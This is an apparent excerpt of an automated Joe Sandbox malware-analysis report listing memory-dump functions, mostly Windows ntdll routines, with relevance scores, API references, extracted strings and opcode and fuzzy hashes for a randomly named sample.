Associated: 00000010.00000002.2102256708.0000000001177000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001232000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001293000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001299000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1170000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 04c5527ef9d84566b5da584b905ad2c050401515cbb3470eca2c005908fae471
Instruction ID: f0d4fc4b3ee57a9efec2b01af106d48a2aff7c8fa0353080499e2426daf40731
Opcode Fuzzy Hash: 04c5527ef9d84566b5da584b905ad2c050401515cbb3470eca2c005908fae471
Instruction Fuzzy Hash: 2AB09B71901DC5C5DE15E7A4470C7177954B7D1701F25C065D3030741F4738C1E5E275

Function 011E2DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0121E73E,0000005A,0127D040,00000020,00000000,0127D040,00000080,01204A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,011EAE00), ref: 011E2DFA

Memory Dump Source

Source File: 00000010.00000002.2102256708.0000000001196000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true

Associated: 00000010.00000002.2102256708.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001177000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001232000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001293000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001299000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1170000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aaaa47c61fe033c8ae60ddee7bc14cb19a7089b35fa0563c11ae5a66e21b4468
Instruction ID: 8bbe7ace7dc8c73456ee74beecaee5e41bb012b8589db98bc21e234580caf02c
Opcode Fuzzy Hash: aaaa47c61fe033c8ae60ddee7bc14cb19a7089b35fa0563c11ae5a66e21b4468
Instruction Fuzzy Hash: 5590023120180413D515715846047070009D7D1241F95C416A1425558DD766CA66A221

Function 011E2C1D Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(011FFD4F,000000FF,00000024,01296634,00000004,00000000,?,-00000018,7D810F61,?,?,011B8B12,?,?,?,?), ref: 011E2C24

Memory Dump Source

Source File: 00000010.00000002.2102256708.0000000001196000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true

Associated: 00000010.00000002.2102256708.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001177000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001232000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001293000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001299000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1170000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a75adb0e2e1d344a673d792a4d8d5f017a67596553c67a8fac96802fa71bd456
Instruction ID: b6f45814368a1fe4a7a10a67aa3a7845e4448d9d5abac35563d6f20b5e001b52
Opcode Fuzzy Hash: a75adb0e2e1d344a673d792a4d8d5f017a67596553c67a8fac96802fa71bd456
Instruction Fuzzy Hash: 0AA0023140160547D656AA5444884A9B158FAD1211359C34AD10A5441A4B3856A5F761

Function 011E35C0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 011E35CA

Memory Dump Source

Source File: 00000010.00000002.2102256708.0000000001196000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true

Associated: 00000010.00000002.2102256708.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001177000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001232000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001293000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001299000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1170000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ccfe6c4727e395ce4d0f24498e5e15db2b0d33a447edd2d7ed466a0937263d4d
Instruction ID: 376d66ea41c619ff5d7d755006ac87696593af1cf7a4ce3f609e01d49fc24d5e
Opcode Fuzzy Hash: ccfe6c4727e395ce4d0f24498e5e15db2b0d33a447edd2d7ed466a0937263d4d
Instruction Fuzzy Hash: EC90023160590402D504715846147061005D7D1201F65C415A1425568DC7A5CA6566A2

Function 0042E76E Relevance: 1.3, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,, xrefs: 0042E7A0

Memory Dump Source

Source File: 00000010.00000002.2101714791.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_42e000_ydRhqlPsLsIczR.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 2089ecb660b73317509ff57f02dd6ef06de93ccda8a2bc01c2e9f21607007826
Instruction ID: 04ef9574f3c3b8ee7bdac1de323653511b042a6361fc4721365f7d376c566ebb
Opcode Fuzzy Hash: 2089ecb660b73317509ff57f02dd6ef06de93ccda8a2bc01c2e9f21607007826
Instruction Fuzzy Hash: C301DDB1D4021856FB24EB95DC46FED7378BB04304F9442DEF60CA2181FB7857448B65

Function 0042E773 Relevance: 1.3, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,, xrefs: 0042E7A0

Memory Dump Source

Source File: 00000010.00000002.2101714791.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_42e000_ydRhqlPsLsIczR.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 94ff4a563c473cbba269c5edcda725ec51dc3507203ebd4c2c95e5c40e408748
Instruction ID: 850a56dab3010957b945cafc322a98a326861459772d070c4794b59f681ab7d8
Opcode Fuzzy Hash: 94ff4a563c473cbba269c5edcda725ec51dc3507203ebd4c2c95e5c40e408748
Instruction Fuzzy Hash: 9C0188B1D4022856FB24EB95DC56FEDB378BB04304F5446DEF60CA2181FB78A7448BA5

Function 0042EAE8 Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000010.00000002.2101714791.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_42e000_ydRhqlPsLsIczR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a6472da3d677e3e2af792e3bdad3cf9c79690fe3c941f8ee11b8c19ae8729ea
Instruction ID: deae23f608883770d92f2bdd5c9400d603d25b97364d8ee681aa6128f1ddd5f4
Opcode Fuzzy Hash: 4a6472da3d677e3e2af792e3bdad3cf9c79690fe3c941f8ee11b8c19ae8729ea
Instruction Fuzzy Hash: 66019A71710219AFDB00CF5AD881EEB37E9EB88390F448169F8198B745E774F941CB91

Function 0042EB24 Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000010.00000002.2101714791.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_42e000_ydRhqlPsLsIczR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff26c552bebccc0c37879bddb67ba8ce9cbeec067f4336c201a3c902b4ab727a
Instruction ID: ba9607cbdb0973f9fd121e4824511abff275903b4fb8aa35ac9df17c2f996f46
Opcode Fuzzy Hash: ff26c552bebccc0c37879bddb67ba8ce9cbeec067f4336c201a3c902b4ab727a
Instruction Fuzzy Hash: FEF0E27A1502089FD708CF61DD8AAE77765EB48380F088368F86E9B506C73491068B80

Function 0042EC99 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000010.00000002.2101714791.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_42e000_ydRhqlPsLsIczR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c9c7b1b56a01b2d9d7c6363650dbf8221112c8e51fae2377dcc8934575f9eff
Instruction ID: d5fc3e99d592776d02a8fb1869163f926c48d56e0b9cb77f9026d7fff85b9899
Opcode Fuzzy Hash: 9c9c7b1b56a01b2d9d7c6363650dbf8221112c8e51fae2377dcc8934575f9eff
Instruction Fuzzy Hash: 98E09272B0052467C330659BAC49FDB6758DFC5B60F49412AFE08D7740E66A990082E8

Function 0042EB33 Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000010.00000002.2101714791.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_42e000_ydRhqlPsLsIczR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4eedcc3a8c81246e5c3a89d4d2af8a2ab838e2c61fdd8a564dfba34fc0bf3281
Instruction ID: bf64837fa5f823cc67c64ba0713ee0baf2e142bcc53afa5ef703b83fd52fce5d
Opcode Fuzzy Hash: 4eedcc3a8c81246e5c3a89d4d2af8a2ab838e2c61fdd8a564dfba34fc0bf3281
Instruction Fuzzy Hash: 5DF09876610209AFDB04CF59D881EDB73A9AB88650F04C559BD1D8B241DB74EA108BA0

Function 0042ECA3 Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000010.00000002.2101714791.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_42e000_ydRhqlPsLsIczR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd8d9b9f1a9abeb20b660dfd33cbb498aea50a214992fac003ef80240aef3479
Instruction ID: d43dd76c6a774fb2193d66ed75213faf0ddd45d681e28f783a0405aab1d21f7d
Opcode Fuzzy Hash: cd8d9b9f1a9abeb20b660dfd33cbb498aea50a214992fac003ef80240aef3479
Instruction Fuzzy Hash: 6FE04F72B0022467C630658BAC46F9B775C9BC1B61F45002AFE089B341E669E90082E8

Function 0042EBC3 Relevance: .0, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000010.00000002.2101714791.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_42e000_ydRhqlPsLsIczR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79de1e15aecca4852e6a2605c3ed8ce2dc3f3a9f9d57891c81fe2282d8357f92
Instruction ID: 10036476df1c9e8868fd2432896fa28b3a0e0344a79792d9538df5b4709ce5fa
Opcode Fuzzy Hash: 79de1e15aecca4852e6a2605c3ed8ce2dc3f3a9f9d57891c81fe2282d8357f92
Instruction Fuzzy Hash: 80C08CB26003087FDB00EA8CDC82F6A339C9B08A50F418045BA0C8B382E571F91087A8

Non-executed Functions

Function 011E4A80 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 51
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDebugPrintTimes.NTDLL ref: 011E4A8F

Strings

0IFw, xrefs: 011E4ADA
0IFw, xrefs: 011E4AFA
0IFw, xrefs: 011E4B14
0IFw, xrefs: 011E4AD0, 011E4AD5
0IFw, xrefs: 011E4AEA, 011E4AEF
0IFw, xrefs: 011E4B04, 011E4B09

Memory Dump Source

Source File: 00000010.00000002.2102256708.0000000001196000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true

Associated: 00000010.00000002.2102256708.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001177000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001232000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001293000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001299000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1170000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0IFw$0IFw$0IFw$0IFw$0IFw$0IFw
API String ID: 3446177414-1820880178
Opcode ID: a97a2496aaf2a79dc002cfd2a5ff50e2de419e0f4d5a2a77f29f11bb457ec079
Instruction ID: 425461b68fa90952877b8d2a8e3062f9cdacfc7550ac6ded642dfb2ba03f784c
Opcode Fuzzy Hash: a97a2496aaf2a79dc002cfd2a5ff50e2de419e0f4d5a2a77f29f11bb457ec079
Instruction Fuzzy Hash: D201DFB2E556106AEF399F6CB80D7863BD1B789B3CF05005EE918DB288E7608CC1D394

Function 011E2890 Relevance: 9.2, APIs: 6, Instructions: 190
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___swprintf_l.LIBCMT ref: 011E293C
___swprintf_l.LIBCMT ref: 011E295E
___swprintf_l.LIBCMT ref: 011E29A3
___swprintf_l.LIBCMT ref: 0121A52E

Memory Dump Source

Source File: 00000010.00000002.2102256708.0000000001196000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true

Associated: 00000010.00000002.2102256708.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001177000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001232000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001293000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001299000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1170000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: ___swprintf_l
String ID:
API String ID: 48624451-0
Opcode ID: def4202602b1acee81080f0b760c011acb8805770da7124a3572bd59ae0df238
Instruction ID: 1d9eb0c0cc8fde56147b142742b253ed1895fd0c7eeebc46e2bf7f0b340977fe
Opcode Fuzzy Hash: def4202602b1acee81080f0b760c011acb8805770da7124a3572bd59ae0df238
Instruction Fuzzy Hash: 265106B6A04556BFCB29DBAC88A497EFBFCBB582407148129F565D3642E374DE00C7A0

Function 011BA250 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 404
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

SsHd, xrefs: 011BA3E4
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 012079D5
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 012079FA
RtlpFindActivationContextSection_CheckParameters, xrefs: 012079D0, 012079F5

Memory Dump Source

Source File: 00000010.00000002.2102256708.0000000001196000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true

Associated: 00000010.00000002.2102256708.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001177000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001232000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001293000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001299000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1170000_ydRhqlPsLsIczR.jbxd

Similarity

API ID:
String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
API String ID: 0-929470617
Opcode ID: 98962a26955f436fe85e471acb35b2693fc1bf905ef3964bd414136a6aea447f
Instruction ID: 310f9202f5d4eafe568c31c54183a72107b5f5c5e99eeebf8b5ead0edb729a05
Opcode Fuzzy Hash: 98962a26955f436fe85e471acb35b2693fc1bf905ef3964bd414136a6aea447f
Instruction Fuzzy Hash: 07E1B4706083028FD729CE28D4D4BAA7BE1BF84314F154A2DFA95CB2D1D771E985CB52

Function 011BD770 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0120948C

Strings

SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01209346
GsHd, xrefs: 011BD874
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 0120936B
RtlpFindActivationContextSection_CheckParameters, xrefs: 01209341, 01209366

Memory Dump Source

Source File: 00000010.00000002.2102256708.0000000001196000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true

Associated: 00000010.00000002.2102256708.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001177000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001232000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001293000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001299000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1170000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: DebugPrintTimes
String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
API String ID: 3446177414-576511823
Opcode ID: c4414ad6cc003abf02571bc0f1e3e6dce718e3a3c9a2acf38c5c52349c3f2f38
Instruction ID: 1a8e1346fe61e7a15b4ed447ea218f4a93999864f7a82276b9135d0ffb47f5f5
Opcode Fuzzy Hash: c4414ad6cc003abf02571bc0f1e3e6dce718e3a3c9a2acf38c5c52349c3f2f38
Instruction Fuzzy Hash: F1E183706143429FDF19CF59D4C0B9ABBE5BB4831CF044A2DE99ACB282D771D984CB52

Function 011EB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 011EB6BF

Strings

0, xrefs: 011EB66F
0, xrefs: 011EB695
-, xrefs: 011EB650
+, xrefs: 011EB65A

Memory Dump Source

Source File: 00000010.00000002.2102256708.0000000001196000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true

Associated: 00000010.00000002.2102256708.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001177000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001232000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001293000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001299000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1170000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
Instruction ID: 3850db725296d21684265c96447fa09c44c78f1ec168be2b39dfd5bd74169e1f
Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
Instruction Fuzzy Hash: 2481E370E49A498EEF2D8EECC459BFEBBF1AF45310F18411AD851A76D1C7308840CB59

Function 011A9126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01202559

Strings

@, xrefs: 011A9175
$, xrefs: 011A9191

Memory Dump Source

Source File: 00000010.00000002.2102256708.0000000001196000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true

Associated: 00000010.00000002.2102256708.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001177000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001232000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001293000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001299000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1170000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$@
API String ID: 3446177414-1194432280
Opcode ID: af60dbdf1f052fd1f5fbd41bcae98327ebf8fabbf21b3ba55da3987be8292d50
Instruction ID: 0b380e452ea2964359e6ecbce5fc3db6ff62986d4630ebacfcc0b364d0be2f9e
Opcode Fuzzy Hash: af60dbdf1f052fd1f5fbd41bcae98327ebf8fabbf21b3ba55da3987be8292d50
Instruction Fuzzy Hash: 1E812C75D10269DBDB36DB54CC45BEEBBB8AB08714F0041EAEA19B7281D7705E84CFA0

Function 011E4960 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 82timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 011E49A4

Strings

0IFw, xrefs: 011E4A23
0IFw, xrefs: 011E4A03
X, xrefs: 011E49F0
0IFw, xrefs: 011E4A13

Memory Dump Source

Source File: 00000010.00000002.2102256708.0000000001196000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true

Associated: 00000010.00000002.2102256708.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001177000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001232000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001293000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001299000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1170000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0IFw$0IFw$0IFw$X
API String ID: 3446177414-2496372868
Opcode ID: a40e5ea6f7917d967607c32cbd086740f1f304af9f08bf6d5826eba12711ffa6
Instruction ID: 672ca53d677af007c4a4bfc7905cf2c8a8341afd55dc229f4993e1a529482ae4
Opcode Fuzzy Hash: a40e5ea6f7917d967607c32cbd086740f1f304af9f08bf6d5826eba12711ffa6
Instruction Fuzzy Hash: A4318B31D0060AEBCF268F9CE848B8D7BE1BBC8768F01409DF90596251D3748AA0CF85

Function 011CDB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 133timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0120F611

Strings

RtlUnlockHeap, xrefs: 0120F65D
Invalid heap signature for heap at %p, xrefs: 0120F653
, passed to %s, xrefs: 0120F662

Memory Dump Source

Source File: 00000010.00000002.2102256708.0000000001196000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true

Associated: 00000010.00000002.2102256708.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001177000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001232000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001293000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001299000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1170000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
API String ID: 3446177414-56086060
Opcode ID: 2cd5dc163e955cfd5d982860eb990135fa1da62a0abb9d29de526b32424ffbed
Instruction ID: 3d97034c791b3f815f2bca71e63cee57304a6405543161200c66e71316623aa3
Opcode Fuzzy Hash: 2cd5dc163e955cfd5d982860eb990135fa1da62a0abb9d29de526b32424ffbed
Instruction Fuzzy Hash: DD414570620642DFDB2ADF68D989B6AB7B4EF11B24F04426DD611873D2C774A880C791

Function 01224755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01224809

Strings

LdrpCheckRedirection, xrefs: 0122488F
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01224888
minkernel\ntdll\ldrredirect.c, xrefs: 01224899

Memory Dump Source

Source File: 00000010.00000002.2102256708.00000000011F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true

Associated: 00000010.00000002.2102256708.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001177000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001232000.00000040.00001000.00020000.00000000.sdmpDownload File
